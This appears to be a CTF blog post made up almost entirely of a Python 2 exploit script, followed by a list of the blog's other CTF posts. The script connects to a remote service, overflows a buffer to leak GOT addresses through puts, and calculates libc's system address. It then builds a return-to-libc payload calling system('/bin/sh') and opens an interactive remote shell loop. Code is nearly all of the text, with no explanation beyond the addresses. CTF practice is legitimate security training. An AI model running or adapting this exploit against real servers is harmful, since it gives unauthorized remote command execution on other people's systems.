from socket import *
from struct import *
import sys
import time
################################
def until(s, string):
data = ''
while string not in data:
data += s.recv(1)
return data
def recvAll(s):
while(True):
data = s.recv(1024)
if not data: break
print(data)
################################
p = lambda x:pack('<L',x)
up = lambda x:unpack('<L',x)
#host = '127.0.0.1'
#port = 22222
host = '175.119.158.133'
port = 9091
puts_system = 152780
sock = socket(AF_INET, SOCK_STREAM)
sock.connect((host, port))
puts_plt = 0x08048560
puts_got = 0x0804C028
pr = 0x080495AF
sock.send("ddd\n")
print sock.recv(1024)
print sock.recv(1024)
sock.send("1\n")
print sock.recv(1024)
print sock.recv(1024)
sock.send("1\n")
print sock.recv(1024)
print sock.recv(1024)
sock.send("1\n")
print sock.recv(1024)
print sock.recv(1024)
sock.send("3\n")
print sock.recv(1024)
print sock.recv(1024)
sock.send("101\n")
print sock.recv(1024)
print sock.recv(1024)
##################################
main_addr = 0x08049490
payload = "A" * 12
payload += p(puts_plt) #ret
payload += p(main_addr)
sock.send(payload + "\n")
print sock.recv(1024)
print sock.recv(1024)
#################################
sock.send("3\n")
print sock.recv(1024)
print sock.recv(1024)
sock.send("101\n")
print sock.recv(1024)
print sock.recv(1024)
sock.send("AAAA" + "\n")
print sock.recv(1024)
print sock.recv(1024)
#################################
read_got = 0x0804C00C
payload = p(read_got)
sock.send(payload + "\n")
print sock.recv(1024)
print sock.recv(1024)
#################################
sock.send("4\n")
print until(sock, "BYE BYE\n")
print sock.recv(1)
read_addr = up(sock.recv(4))[0]
print "read : " + hex(read_addr)
print "printf : " + hex(up(sock.recv(4))[0])
print "fflush : "+ hex(up(sock.recv(4))[0])
print "fgets : " + hex(up(sock.recv(4))[0])
print "__stack_chk_fail : " + hex(up(sock.recv(4))[0])
print "_IO_getc : " + hex(up(sock.recv(4))[0])
print "malloc : " + hex(up(sock.recv(4))[0])
puts_addr = up(sock.recv(4))[0]
print "__gmon_start__ : " + hex(up(sock.recv(4))[0])
print "__libc_start_main : " + hex(up(sock.recv(4))[0])
print "wrtie : " + hex(up(sock.recv(4))[0])
print "setvbuf : " +hex(up(sock.recv(4))[0])
print "putchar : " + hex(up(sock.recv(4))[0])
print "__isoc99_scanf : " + hex(up(sock.recv(4))[0])
#read_offset = 0x000db6f0 #here
#system_offset = 0x000403b0 #here
#read_system = read_offset - system_offset
read_system = 648672
system_addr = read_addr - read_system
print "read_addr : " + hex(read_addr)
print "system_addr : " + hex(system_addr)
print "STAGE1 END"
######################################################################################################
sock.send("/bin/sh\n")
print sock.recv(1024)
print sock.recv(1024)
sock.send("1\n")
print sock.recv(1024)
print sock.recv(1024)
sock.send("1\n")
print sock.recv(1024)
print sock.recv(1024)
sock.send("1\n")
print sock.recv(1024)
print sock.recv(1024)
sock.send("3\n")
print sock.recv(1024)
print sock.recv(1024)
sock.send("101\n")
print sock.recv(1024)
print sock.recv(1024)
##################################
payload = "A" * 12
payload += "AAAA" #ret
payload += "AAAA"
sock.send(payload + "\n")
print sock.recv(1024)
print sock.recv(1024)
#################################
sock.send("3\n")
print sock.recv(1024)
print sock.recv(1024)
sock.send("101\n")
print sock.recv(1024)
print sock.recv(1024)
binsh_addr = 0x0804D7A0
payload = "AAAA" * 3
sock.send(payload + "\n")
print sock.recv(1024)
print sock.recv(1024)
#################################
view_addr = 0x080496f9
payload = p(system_addr)
payload += p(view_addr)
payload += p(binsh_addr)
sock.send(payload + "\n")
#################################
sock.send("4\n")
print until(sock, "BYE BYE\n")
print sock.recv(1024)
#print sock.recv(1024)
#print sock.recv(1024)
while True:
cmd = raw_input('$ ')
sock.send(cmd+"\n")
print sock.recv(1024)
'CTF' 카테고리의 다른 글
| DEFCON 2016 xkcd (0) | 2016.05.26 |
|---|---|
| 2016 PCTF tonneree 200점 (0) | 2016.04.21 |
| 2016 codegate JS_IS_NOT_A_JAIL exploit only (0) | 2016.03.15 |
| 2015 Christmas CTF [FORENSIC] 100 do you want to~ (0) | 2016.01.08 |
| 2015 CSAW CTF precision 100 exonly (0) | 2015.09.19 |
